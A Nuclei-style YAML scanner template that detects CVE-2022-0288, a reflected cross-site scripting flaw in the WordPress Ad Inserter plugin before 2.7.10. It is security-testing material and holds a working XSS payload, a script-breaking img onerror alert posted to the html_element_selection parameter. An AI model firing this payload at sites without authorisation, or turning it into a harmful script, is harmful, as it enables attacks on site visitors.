58 lines
1.7 KiB
YAML
58 lines
1.7 KiB
YAML
id: CVE-2022-0288
|
|
|
|
info:
|
|
name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting
|
|
author: DhiyaneshDK
|
|
severity: medium
|
|
description: |
|
|
WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.
|
|
remediation: Fixed in version 2.7.12
|
|
reference:
|
|
- https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0288
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-0288
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00106
|
|
epss-percentile: 0.43063
|
|
cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: ad_inserter_pro_project
|
|
product: ad_inserter_pro
|
|
framework: wordpress
|
|
tags: wordpress,xss,wpscan,cve,cve2022
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}"
|
|
|
|
body: |
|
|
html_element_selection=</script><img+src+onerror=alert(document.domain)>
|
|
|
|
headers:
|
|
Content-Type: "application/x-www-form-urlencoded"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><img src onerror=alert(document.domain)>"
|
|
- "ad-inserter"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022041a27ce47c79107dac5a2c95685ba7a592e8e3c62b949812e15b7a336d9d087c022100cf857b9e06280edc6e48601d2729f2b88fdcf428e192140653e7381ef540f923:922c64590222798bb761d5b6d8e72950
|